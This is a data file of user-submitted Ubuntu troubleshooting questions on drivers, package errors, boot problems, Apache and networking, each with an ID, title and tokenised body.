521776	ca n't install gnome shell extensions ?	new to ubuntu . when i tried to get the gnome user theme extension from the website , it would not load the button to install . so i tried the command in the terminal sudo apt-get install gnome-shell-extensions-user-theme and got the error message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gnome-shell-extensions-user-theme any help ? thanks ! update : it 's not the lack of an extension , i know i have it installed , and there is no pink banner . the page does not load any button for me to install ( or the user reviews section . ) the page does load on chromium ( with the pink banner though , no extension ) so i do n't think its a network issue . also , the 'duplicate'page is not my exact issue . and i tried this on firefox , which has the right extension on it by default .
521782	error while resuming the wireless network connection in ubuntu 14.04.1	when i disconnect from a wireless network and try to reconnect , it fails . i do get this error message : error enabling device gdbus.error : org.freedesktop.modemmanager1.error.core.failed : failed to find a usable modem character set
521784	what is upstream program ?	maybe it is a ridiculous question but i want to know exactly what is an upstream program ? here in this documentation and other debian packaging documentation mentioned upstream program . i want a definition to create upstream from my application . for example is my web application which is written in java is an upstream ?
521785	installing blackberry usb drivers in ubuntu 14.04 ?	is there any way to install blackberry usb drivers in ubuntu14.04 ? i want to install some of the apps from http : //appworld.blackberry.com is there any way ? ? ? ? ? ? ? ?
521786	when i start the studio.sh of android studio then it shows this error	jdk required : 'tools.jar ' seems to be not in android studio classpath . please ensure java_home points to jdk rather than jre .
521788	is it bad to chown /media/username for your web server ?	i 've been trying to get this software working for my webserver . it 's called owncloud . i had partitioned my hard drive just to host my files on my web server . i made a new partition ( 128gb ) and i 've been trying to get it to work with owncloud . but it will not work whatever i do . it says this : data directory ( /media/user/2cf254b6f254864c/owncloud/data ) is invalid please check that the data directory contains a file `` .ocdata '' in its root . can not create `` data '' directory ( /media/user/2cf254b6f254864c/owncloud/data ) this can usually be fixed by giving the webserver write access to the root directory . even though i have that all there . so , someone on their forum told me to use chown -r www-data : www-data /media/user/2cf254b6f254864c/owncloud/data , so i did . but it did n't work . so then i kept going down the directories , chown'ing them . i have www-data access to /media/user/ is this a bad thing ? i remember i had to reinstall because i accidentally chmod'ed root with 777 . how can i get this to work ?
521789	brightness problem	hello there linux user i am a new user and i do n't know how to turn down my brightness of my laptop when i change it with the keys it show on the screen going down but the screen is not dimming i do n't know why and i will really like to know why since i want to use this a long time please help my laptop type is : acer asphire-v5-561pg 6819 version is there any fix please help
521791	installation of ubuntu in windows 8.1 pro	i recently bought a windows 8.1 pro , it is of 8gb ram and 1tb hard disk with an i5 processor.i want to install ubuntu by making partition of ram , hard disk and anything required .does the ubuntu while installation ask such requirements of partition ?
521794	dual boot ubuntu with raid configuration	i have a pc currently running on windows 7 with following specifications : intel core i7 cpu 930 @ 2.80 ghz installed memory ram : 6 gb when configured it was raid and showing 2 partitions , but when i reformatted it with windows 7 the software raid disappeared and it showed 4 hard discs 0f 650 gb capacity each . now for almost a year i am using ubuntu only on my home pc and now i want to dual boot it on my office pc . when i tried to install it it failed and now i am giving some screen shots of it for your reference . i first enter to trial mode to find out all my devices are working and from there i go to install . i selected the language option and other settings as above now i got the problem , it don’t showing “install along side of windows” . ! [ enter image description here ] [ 5 ] so i selected some thing else . now i got confused as i cant see sda-1,2 etc as i have 4 different hard drives . rather it showing the raid and i dont know how to select and format which drive as i have data on my d , e , f drives and i want to partition c drive to install ubuntu . for your reference i am giving some screen shots of gparted and disc informations below : - i am a very basic user to ubuntu and want it very much for my browsing , music , video and some multimedia works like audio video editing and photo retouching with your best free software like gimp , ink scape , pitivi , open shot etc . i have no knowledge in command line and considering that please help me step by step how i can install it along side of windows . ( as for my living i depend on adobe , corel products and if ubuntu helps me i may consider to switch over from windows and adobe too ) please help . i wnt to post images but it saying need 10 reputations for that
521795	ubuntu crashed with whitish screen	ubuntu was working fine , i closed it down at night . the next day it would not open . i get a whitist color screen with black looking leaves on the left side of the screen . how do i get it to open up .
521798	how can update all the git repositories the next time a user log in ?	i 'm working on creating a virtual machine using ubuntu that is prebuilt lamp stack development environment for drupal . i will love to have few projects in virtual machine however , after while they are going to be out-date and i want to make sure that all the projects are up-dated . all the projects will be download it by using git . after i finish the configuring the dev environment i will make a copy of that and upload it . so , the next time the user will open the environment it will automatics check if the repository have change and if does will make a change . this will make my life easier because i will not have too update every time a project get updated it . so my question is how can update all the git repositories the next time a user log in ? i 'm currently using ubuntu 14.04 desktop .
521803	networking stopped working after reboot	i powered down my headless , no gui file server to replace a seized fan and now the eth0 interface is n't picking up an ip address via dhcp ; during boot it just sits there `` waiting for network configuration '' and eventually times out . /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp $ grep eth0 /var/log/syslog sep 9 18:14:27 server kernel : [ 1.921881 ] e1000 0000:02:00.0 : eth0 : ( pci:33mhz:32-bit ) 00:07 : e9:08:02:17 sep 9 18:14:27 server kernel : [ 1.921894 ] e1000 0000:02:00.0 : eth0 : intel ( r ) pro/1000 network connection sep 9 18:14:27 server kernel : [ 9.657153 ] addrconf ( netdev_up ) : eth0 : link is not ready sep 9 18:14:27 server kernel : [ 10.140090 ] addrconf ( netdev_up ) : eth0 : link is not ready sep 9 18:14:29 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 4 sep 9 18:14:33 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 11 sep 9 18:14:44 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 14 sep 9 18:14:58 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 sep 9 18:15:06 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 9 sep 9 18:15:15 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 sep 9 18:15:27 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 19 sep 9 18:15:46 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 sep 9 18:15:53 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 sep 9 18:16:05 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 16 sep 9 18:16:21 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 20 sep 9 18:16:41 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 15 sep 9 18:16:56 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 14 sep 9 18:17:10 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 21 sep 9 18:17:31 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 13 sep 9 18:17:44 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 19 sep 9 18:18:03 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 sep 9 18:18:10 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 sep 9 18:18:17 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 sep 9 18:18:29 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 14 sep 9 18:18:43 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 20 sep 9 18:19:03 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 13 sep 9 18:19:16 server dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 11 the dhcp server is my adsl modem which is working and assigning addresses to other network devices . ideas ? update 1 : booted with an earlier , known-working , kernel ; still not working . update 2 : tried different ethernet cables ; still not working .
521805	12.04 .. red circle icon in top right corner - ca n't remove	good morning , i am new to the whole `` ubuntu '' system , i havean elementary os , version 0.2.1 `` luna '' 64 bit , built on 12.04.. everything was working fine up until i was in the software center browsing over different apps.. i ran across one called ( not sure if right spelling ) sympatec installer ( reviews stated that it 's much better than the `` software center '' ... so i proceeded to install the app , and now i have the red stop sign circle icon in the top right corner of my screen . i am not able to open the software center or perform any type of update . software center closes after 5 seconds every time . update manager gives me this reading : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'w : duplicate sources.list entry hlink : security.ubuntu.com/ubuntu/ precise-security/restricted amd64 packages ( /var/lib/apt/lists/security.ubuntu . com_ubuntu_dists_precise-security_restricted_binary-amd64_ packages ) , w : duplicate sources.list entry hlink : security.ubuntu.com/ubuntu/ precise-security/main amd64 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_main_binary-amd64_packages ) , w : duplicate sources.list entry hlink : security.ubuntu .com/ubuntu/ precise-security/multiverse amd64 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_multiverse_binary-amd64_packages ) , w : duplicate sources.list entry hlink : security.ubuntu .com/ubuntu/ precise-security/universe amd64 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_universe_binary-amd64_packages ) , w : duplicate sources.list entry hlink : security.ubuntu.com/ubuntu/ precise-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_restricted_binary-i386_packages ) , w : duplicate sources.list entry hlink : security.ubuntu .com/ubuntu/ precise-security/main i386 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_main_binary-i386_packages ) , w : duplicate sources.list entry hlink : security.ubuntu .com/ubuntu/ precise-security/multiverse i386 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_multiverse_binary-i386_packages ) , w : duplicate sources.list entry hlink : security.ubuntu .com/ubuntu/ precise-security/universe i386 packages ( /var/lib/apt/lists/security.ubuntu .com_ubuntu_dists_precise-security_universe_binary-i386_packages ) , e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dl.google .com_linux_talkplugin_deb_dists_stable_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . ' i am clueless as to what steps i should take to solve this problem , it does n't look very good . thank you !
521806	ubuntu 14.04 no login screen after install of nvidia driver	i 've installed ubuntu 14.04 lts from scratch , everything worked fine until i switch the graphic driver from nouveau to nvidia 331 ( graphic card : nvidia geforce 9300m ) . i 've installed the nvidia 331 and nvidia prime and after a restart the screen is only schowing the ubuntu logo but never comes to the login screen ! by displaying the list of installed packages dpkg -l | grep -i nvidia all needed packages are correctly installed . by deinstalling the nvidia driver : sudo apt-get remove -- purge nvidia-* libcuda* bbswitsch* and restarting ubuntu it seems to work normally . i could only see a difference in the terminal window ( different appearance as before installing nvidia ) i already had ubuntu 14.04 lts with nvidia driver and prime on this computer working , just wondering what 's happening now . is there a way to get it work again ?
521811	i am not able to install c++ compiler	i tried to install g++ with sudo apt-get install g++ then it comes like pulseaudio is already the newest version . gvfs-fuse is already the newest version . xorg-docs-core is already the newest version . libgnome-bluetooth8 is already the newest version . xserver-xorg-video-ati is already the newest version . xserver-xorg-video-siliconmotion is already the newest version . gstreamer0.10-alsa is already the newest version . python-gconf is already the newest version . erlang-crypto is already the newest version . gstreamer0.10-tools is already the newest version . libgphoto2-port0 is already the newest version . libglib2.0-0 is already the newest version . libgdata7 is already the newest version . python-configglue is already the newest version . gnome-session-bin is already the newest version . libgomp1 is already the newest version . xserver-xorg-video-tseng is already the newest version . usb-creator-gtk is already the newest version . software-properties-gtk is already the newest version . libcupsimage2 is already the newest version . gcc-4.4-base is already the newest version . libgnome-media0 is already the newest version . liblaunchpad-integration1 is already the newest version . gconf-defaults-service is already the newest version . gnome-power-manager is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libschroedinger-1.0-0 : depends : liborc-0.4-0 ( > = 1:0.4.10 ) but 0.4.6-1 is to be installed libschroedinger-dev : depends : liborc-0.4-dev ( > = 1:0.4.10 ) but it is not installable e : broken packages
521812	fresh install display broken	i 've just installed ubuntu 14.4 in an vwmware vm and nothing seems to work . one big problem is the display . my old vms running 10.4 resize automatically when i resize the window in the host , this one does not . this is bad , but it came worse : after installation of awesome my display looks like this . the default window manager stopped working completely no reaction to anything . now i 'm lost with a wm where i ca n't even find the display setting or anything what could fix it . sure , i could drop the vm and start over , but why should i expect it to get any better ... it was a fresh install . my graphic card is 01:00.0 vga compatible controller : ati technologies inc device 68d8 what can i do ?
521816	need solution for flickering mouse cursor in ubuntu 14.04 .	i made a fresh ubuntu 14.04 installation on my lenovo laptop ( z570 ) . after successful installation , the mouse cursor is flickering and disappearing . i tried disabling the unknown display in the display settings , but the problem of mouse cursor flickering still persists . any perfect solution for this problem ?
521817	what 's the best download manager ?	i 'm currently using xdman but it 's very buggy & it has n't been updated since 7 months i can say it 's an abandoned project & further more when i want to install it usc say that the package is damaged
521818	change a jpanel to another on a jframe . how ?	i have a jpanel ( panelone ) on a jframe ( frame ) . on the panelone i have two buttons and i like to , if i pushing one button the jpanel will change to another . but how ? i ca n't access the frame from panelone .
521819	how to install both xammp and bugzilla in same pc	is it possible to install both bugzilla and xammp in same pc ? i have installed both in separate pc and both are working fine . now i want to install in same pc . please let me know how to do this .
521822	serial port not working on 14.04 lts desktop	system spec : ubuntu 14.04 lts desktop x64 on dell optiplex 3020 . i am interfacing a voip card ( ti manufactured ) which can be connected to pc by using serial port ( rs 232 ) . ca n't provide more info on card . now the matter is serial ports are listed in /dev , but i ca n't use them to get data on s/w modem minicom . ports are working well in windows environment ( on com3 port ) as well within ubuntu 12.04 lts x64 ( on ttys1 port ) running on vmware workstation . this means problem is with ubuntu 14.04 lts only . i think it 's kernel version problem , kernel does n't have support for serial port , so i looked for new kernel but no version is having patch or fixes for that.what to do , guidance needed ... ! ! ! should i go for kernel update/upgrade , then which kernel version will resolve this issue ? ? here is output for lshw command ... *-serial unclaimed description : smbus product : 8 series/c220 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7d19000-f7d190ff ioport : f040 ( size=32 ) what does unclaimed means here ? note : this question is already been asked by someone else but due to no one is responding , no resolution yet found , i have raised it again with my problem , problem is common . just if anybody can help .
521823	lubuntu alongside kubuntu - doubled up apps	i installed kubuntu , and on top of that lubuntu-desktop as i need to use the lubuntu environment for testing some things . now when i log into kubuntu there seem to be some lubuntu applications floating around that are at best using up resources and at worst interfering . i ended up wth two screen-lockers ( so need to log in twice to get back to a session ) and the ibus keyboard layout app which interferes with the kubuntu one . there may be other processes that are doubling up so i wonder what is the best way of preventing this doubling up in a global fashion ? i disabled light-locker on kubuntu using light-locker-settings and now the light-locker process does not show up and i uninstalled ibus , but i still run the risk of missing some processes .
521824	freeserif font more condensed after update to 14.04	i am writing a book using libreoffice . until recently i used ubuntu 12.04 and libreoffice 3.5.7.2 . the body text of the book is typeset with freeserif 11pt . before my upgrade to ubuntu 14.04 and libreoffice 4.2.6.3 ( which came with 14.04 ) , the book had 210 pages . after the upgrade the book has 195 pages , because the freeserif font now was more condensed . when i open the odt file in a different computer with ubuntu desktop 12.04 and libreoffice 3.5.7.2 , the book has 210 pages , and so it has when i open the same file in a computer with windows 7 and libreoffice 4.2.6.3 the book has 210 pages . ( of course the free* fonts are installed in all computers . ) so with 14.04 and 4.2.6.3 the freeserif font is rendered differently . the difference is big , about 7 % , which makes the text look ugly , and the line breaks and the hyphenation have been changed , not to say ruined . obviously , there is something wrong with the rendering of the freeserif font in the combination of ubuntu desktop 14.04 and libreoffice 4.2.6.3 . will this error be corrected ?
521825	upgrade from 12.04 to 14.04 failed	i 'm trying to upgrade to trusty tahr 14.04 but i get these messages : w : failed to fetch gzip : /var/lib/apt/lists/partial/fj.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/fj.archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . please tell me what to do ! thanks !
521827	ca n't send email with thunderbird and gmail	i configured my gmail account in ubuntu 14.04 with thunderbird . i only can receive mail but can not send it . i am looking for a solution but with basic configuration it is not possible . version of thunderbird is 32.0 .
521828	how to mount uuid under linux name /dev/sdx/	on my workstation after boot , sometimes the name for my same harddisk in linux changes from /dev/sdg/ to /dev/sdi/ how can i make this fixed , that the uuid is mounted exactly with the name /dev/sda for example ? the problem comes from making a virtual machine from a raw file : vboxmanage internalcommands createrawvmdk -filename ~/.virtualbox/win7.vmdk -rawdisk /dev/sdg -partitions 2,3 -mbr ~/.virtualbox/fake.mbr -relative if now the name /dev/sdg changes to /dev/sdi my virtual machine has troubles to start ...
521829	apache configuration problems ? why perl scripts ca n't be executed - browser download scripts	i 've got wrong apache configuration . my script do n't want to be executed and browser trying to download it as a file . < virtualhost *:80 > serveradmin webmaster @ localhost servername president.com documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /var/www/cgi/ < directory /var/www/cgi/ > allowoverride none options +execcgi -multiviews +symlinksifownermatch require all granted addhandler cgi-script .cgi .pl < /directory > scripts are own by www-data : www-data with rights 755 and can be executed ( +x ) . shebang e.g . # ! /usr/bin/perl . error log is empty .
521830	xubuntu 14 backup and reinstall or make /home folder	i am dual-booting win8 and xubuntu 14 , but i only gave xubuntu 30gb space and decided to make it my primary os now . i shrinked my windows volume and managed to free up around 300gb space.now i would like to use this space to make a /home folder in xubuntu and move my data there . what could be the best solution to solve this ? i would like to keep my xubuntu installed packages and configs so i would not have to start over . is it possible to make this 300gb space to /home partition under xubuntu without reinstalling ?
521831	ubuntu server ( vm ) hangs after `` begin : running /scripts/init-bottom ... done ''	my bootup hangs , as seen in the image below . ( there has been an update . check the edit below ) when i press escape , it tabs to this screen : the whole story : this vm ubuntu server is used for a website . the website suddenly had an error , and i thought turning it off and turning it on would fix it . ( heh ) never had i been more wrong . so i ran sudo /sbin/reboot which i do sometimes and it normally works afterwards . but this time , it does n't . i tried accessing the vm console , rebooted it from there , and now the bootup hangs at the shown image above . help ? additional details : ubuntu linux 3.0.0-32-server we 're using vsphere client for the vm as you can see , i 'm not exactly the linux expert edit i removed the fsck checks but it still hangs . i pressed ctrl+alt+f1 to see the text logs and this is the result .
521832	difference between /usr and /home from installation perspective	i am not a pro in linux and i was thinking that where does the files get stored when i do apt-get install . i understand that different linux distributions do things differently , but i am taking a generic case here . i read the rute documentation , and other answers on stackexchange . now , my question is that say i have two users a and b . this means , i will have two directories /home/a and /home/b ( right ? ) now , if user a installs anything , none of the installation go in the home directory . but they are installed in /usr directory . now , the binary file will go in /usr/bin if it uses any libraries that goes in /usr/lib etc etc . ( right ? ) so , if i login as b and try to run the program installed by a , will i be able to run it ? what all factors determine that . how does the system differentiate that what softwares installed in /usr are installed by which user . i am assuming that if user b now installs something else , then all the data related to that will also be in /usr/ directory ( right ? ) also , any of the packages installed by any of the user do not go in /bin folder right ? that is specific to system binaries . what if there are no users on my system . will there be no files in /usr folder ? ie in my office , when i remote login to a server , it shows no user in home directory . thanks .
521833	right-click - > open in filezilla throws an error	in filezilla ( latest version ) when i right-click on an .htm file and press open , it opens that file in firefox - > that 's what i needed . but if i open an .html file and press open , it throws an error : the file '/home/username/desktop/about.html ' could not be opened : no program has been associated on your system with this file type . but it is associated in my os , /etc/gnome/defaults.list : text/html=firefox.desktop if i open .html or .html files in explorer , they open in firefox , but why does n't this happen in filezilla ?
521834	find files that are heavily used in the system	atopsar -d 30 - shows that one of hard drive ( sda ) in the system is heavily used . is there a way to know which files are heavily used on hdd ?
521836	what is meant by bash : export : `/home/jntuacep/venky/ns-allinone-2.35/lib ' : not a valid identifier	my .bashrc file contains : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi export path= $ path : /home/jntuacep/venky/ns-allinone-2.35/bin : /home/jntuacep/venky/ns-allinone-2.35/tcl8.5.10/unix : /home/jntuacep/venky/ns-allinone-2.35/tk8.5.10/unix export ld_library_path= $ ld_library_path : /home/jntuacep/venky/ns-allinone-2.35/otcl-1.14 , /home/jntuacep/venky/ns-allinone-2.35/lib export tcl_library= $ tcl_library : /home/jntuacep/venky/ns-allinone-2.35/tcl8.5.10/library
521845	it is safe to do-release-upgrade from 12.04.4 to 14.04.1 ?	i have a server running 12.04.4 32 bits ubuntu server , and i wonder if there could be any unsolvable problem updating to 14.04.1 as the terminal suggest me ( using do-release-upgrade ) to do .
521846	how to trace requested memory references ?	i 'm working on page replacement algorithm . for testing algorithm , i 'm trying to analyse pattern in which memory would be requested . can i get list of requested page to page replacement algorithm in ubuntu ?
521847	error processing package mumble-django	everytime when i try to install update from the terminal this error is displayed . how do i sort it out ? setting up mumble-django ( 2.10-2 ) ... dpkg : error processing package mumble-django ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mumble-django e : sub-process /usr/bin/dpkg returned an error code ( 1 )
521848	how to roll back changes i made today - i can only sign in as root	i am a newbie to ubuntu ( 14.04 lts ) and i have loaded it in one of my spare pcs and have had it running for a few months . i am not sure i am ready for ubuntu and i am not sure if ubuntu is ready for prime time . that said i am trying to learn it but find it rather frustrating at times . i have a user id of userone which is ( not root ) the one i use always . today i noticed that my system needed a few updates and i went ahead and upgraded ! : - ( now when i boot up and try to sign as userone i can get it , get the desktop but absolutely nothing else . ca n't right click , ca n't bring up the sidebar menus , nothing . i have to shut down by pressing the power button and sign in as root , which i had never dome before . can i , say , remove all changes made to the system in the last 3 hours from this account ( root ) ? and if so how ? grateful for any help . thanks
521850	device not visible under file view	so as of last week everything was good and dandy , but now ubuntu 14.04 lts file view will not show any of the devices connected to my computer . i currently have a usb stick , mouse , and kindle plugged into the computer ... here is my lsusb output . bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 04f2 : b40d chicony electronics co. , ltd bus 003 device 007 : id 18a5:0302 verbatim , ltd 32gb flash drive bus 003 device 004 : id 046d : c018 logitech , inc. optical wheel mouse bus 003 device 003 : id 138a:0050 validity sensors , inc . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i have no clue what the problem is . any suggestions ?
521851	how to block installing grub into mbr while upgrade ?	i have a problem with blocking installing grub into mbr . i have to block it in ubuntu and debian template to not let users `` destroy '' their xenservers ( with grub in mbr they wont boot ) . ubuntu ask for it - so users with more experience do n't install it in mbr , but all in all this is very common . bigger problem is with debian - he do n't even ask while upgrade and automatically install grub into mbr . is there some configuration files , which can i use to not permit grub to do this while apt-get upgrade ? sorry for my english - i am not best in writing in it : )
521853	grub problem after reinstalling , ubuntu 14.04	last day i was removed grub and grub-pc for fixing some boot error problem and reinstall again , but i got a error in installing grub-pc and i forced to reboot my system , after rebooting i lost my grub and i was installed with live cd , after installing grub when i boot my system and i get grub command line input alike grub > , i tried to load vmlinuz and initrd by command line but i ca n't load currently and i just can go to initrd shell when i enter ls command i get this : hd0 hd0 , msdos5 hd0 , msdos1 lvm/ubuntu -- vg-swap_1 lvm/ubuntu -- vg-root my commands : set root= ( hd0,1 ) linux /vmlinuz-3.13.0-35-generic inittd /inittd.img-3.13.0-35-generic boot after this commands i am going in ash and initramfs cli . please help me i ca n't reinstall my os again .
521854	rsa certificate configured for localhost.localdomain:443 does not include an id which matches the server name	i got this error when setting up ssl on ubuntu 14.04.1 lts ( apache2 , openssl ) ah01909 : rsa certificate configured for localhost.localdomain:443 does not include an id which matches the server name any thoughts on what might be going on here ? thanks !
521855	software updater fail , and `` apt-get update '' throws `` invalid operation update '' - what next ?	i 'm running a fairly vanilla 14.04 ubuntu on a newish hp desktop . just yesterday i got the dreaded `` failed to download repository information '' : a screenshot of this window has been seen on askubuntu before . i have checked related threads here , and also looked at a helpful off-site article . the strange thing now is that when i run sudo apt-get update i get back e : invalid operation update , so i ca n't even work out what the offending ppa is . the updater does find updates and apply them ( you can see what i got today if you like ) , but that 's little help in diagnosing the problem . so my question : how do i fix this ? !
521858	what happens when i try to run firefox on a remote server from my local machine	i am connecting to a remote server through putty . whereis firefox shows that firefox is installed on the remote machine . now , i want to know what is going to happen when i run firefox . normally , if i were working on my local linux machine , and if i did firefox there , then it would open the interface locally and open the window . now , if i am doing the same on a remote machine through putty , wouldnt it open the firefox window on the remote machine . who tells the remote server dont open firefox window here , but send it to the user 's machine who has logged in ? also , what info does the server send to user , as part of firefox 's visual interface . do i need to install something on my local machine , to be able to receive that info ? thanks
521859	can not find content in samsung gt-n8000 ( note 10.1 kitkat ) connected to ubuntu 12.04 lts ( dell )	i am a beginner-level ubuntu user . my samsung note tablet ( specs given in title ) connected without issues and showed as an external usb device on the dashbar at first . after a few days , and a lot of updates etc done on my ubuntu 12.04 lts , the following has happened : tablet connects and is identified as samsung_android unlike gt-n8000 previously does not show up as an external usb on the dash . rather shows up as a drive in home folder with option to mount/unmount all the folders are visible but no contents inside . the top of the folder says - there are files loaded on an audio player ( something similar to that ) and open vlc media player the tablet is running android kitkat and mtp is checked . usb debugging is unchecked . checking/unchecking usb debugging mode had no effect . i followed some of the advice available online . following are the links for reference but not pasting content here . http : //hdfpga.blogspot.co.uk/2012/03/connecting-samsung-samsung-galaxy-tab.html http : //www.omgubuntu.co.uk/2011/12/how-to-connect-your-android-ice-cream-sandwich-phone-to-ubuntu-for-file-access but on completion of their instructions which were more or less similar , the terminal started opening up with : “alias : command not found “alias : command not found “alias : command not found divyank @ divyank-inspiron-3542 : ~ $ i realized i had made an error in copy pasting the android-connect and android-disconnect links before - did not re-type the quotes in the command given on the website . i redid the whole procedure but fixing the quotes has n't helped either . the tablet connection problem still the same . the terminal is now opening with these : “alias : command not found “alias : command not found “alias : command not found bash : alias : -o : not found bash : alias : allow_other : not found bash : alias : /media/samsung_android : not found bash : alias : -u : not found bash : alias : /media/samsung_android : not found divyank @ divyank-inspiron-3542 : ~ $ when i typed the command android-connect after connecting the tablet , this came up : divyank @ divyank-inspiron-3542 : ~ $ android-connect fuse : missing mountpoint parameter divyank @ divyank-inspiron-3542 : ~ $ i do not have programming knowledge but detailed advice is most welcome . thank you all ! : )
